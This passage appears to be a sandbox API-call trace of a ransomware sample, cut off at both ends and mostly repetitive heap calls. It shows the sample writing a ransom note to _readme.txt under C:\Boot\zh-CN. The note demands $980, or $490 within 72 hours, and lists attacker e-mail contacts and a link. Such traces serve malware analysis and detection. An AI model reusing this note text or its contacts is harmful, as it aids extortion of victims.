lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.344] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.344] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.344] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.344] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.344] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.344] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.344] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.344] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.344] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.344] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.344] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.344] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.344] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0056.344] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.344] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.344] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.344] PathFindFileNameW (pszPath="") returned="" [0056.344] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.344] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.345] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.345] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.345] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.345] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.345] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.345] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0056.345] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0056.345] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.345] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.345] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.345] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.346] WriteFile (in: hFile=0x5c8, lpBuffer=0x32acff0*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x32acff0*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.346] CloseHandle (hObject=0x5c8) returned 1 [0056.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.347] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.347] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.347] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.347] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec9c7b0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.347] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec9c7b0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.347] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.347] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, 